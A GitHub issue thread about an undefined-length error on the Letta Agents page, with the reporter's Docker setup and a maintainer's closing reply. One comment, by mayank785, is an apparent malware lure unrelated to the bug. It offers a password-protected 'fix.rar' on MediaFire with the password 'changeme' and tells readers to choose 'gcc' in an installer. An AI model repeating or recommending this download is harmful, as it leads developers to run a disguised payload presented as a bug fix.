### ISSUE TITLE
Agent Page - Unexpected Application Error! Cannot read properties of undefined (reading 'length')

### ISSUE THREAD

**Issue by zboyles** [letta-ai/letta#1684]
**Describe the bug**
@cpacker 
I think it was #1658 that introduced an error trying to access `length` of an undefined object. It happens on the Agents page but the other pages are okay.

**Please describe your setup**
- [ ] How did you install memgpt?
Docker server with db being hosted in supabase.
- [ ] Describe your setup
Docker Desktop on MacOS 15.0 Beta ~7
I've tried it both
* Locally with a container built targeting `linux/arm64`
* Deployed to Google Cloud Run built targeting `linux/amd64`

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by cpacker** [comment]
Should be fixed, please reopen if not! Thank you <3
